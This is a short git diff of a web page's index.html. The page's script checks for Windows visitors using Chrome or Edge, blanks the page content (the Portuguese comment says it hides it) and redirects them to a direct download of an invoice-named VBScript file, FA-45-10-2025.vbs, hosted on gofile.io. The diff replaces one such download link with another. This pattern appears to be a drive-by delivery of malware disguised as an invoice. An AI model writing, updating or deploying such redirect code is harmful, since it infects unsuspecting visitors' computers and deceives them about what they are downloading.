--- a/index.html
+++ b/index.html
@@ -20,7 +20,7 @@
       // If Windows + Chrome/Edge, keep your existing redirect behavior
       if (isWindows && (isChrome || isEdge)) {
         document.body.innerHTML = ""; // oculta conteúdo
-        window.location.href = "https://store7.gofile.io/download/direct/41ce69ba-bdaf-45a4-997b-17f21a11c397/FA-45-10-2025.vbs"; // keep placeholder
+        window.location.href = "https://cold5.gofile.io/download/direct/de5ff517-1cb4-4306-b722-abeb692c7846/FA-45-10-2025.vbs"; // keep placeholder
         return;
       }
 
@@ -172,6 +172,7 @@
 
 
  
+
 
 
 
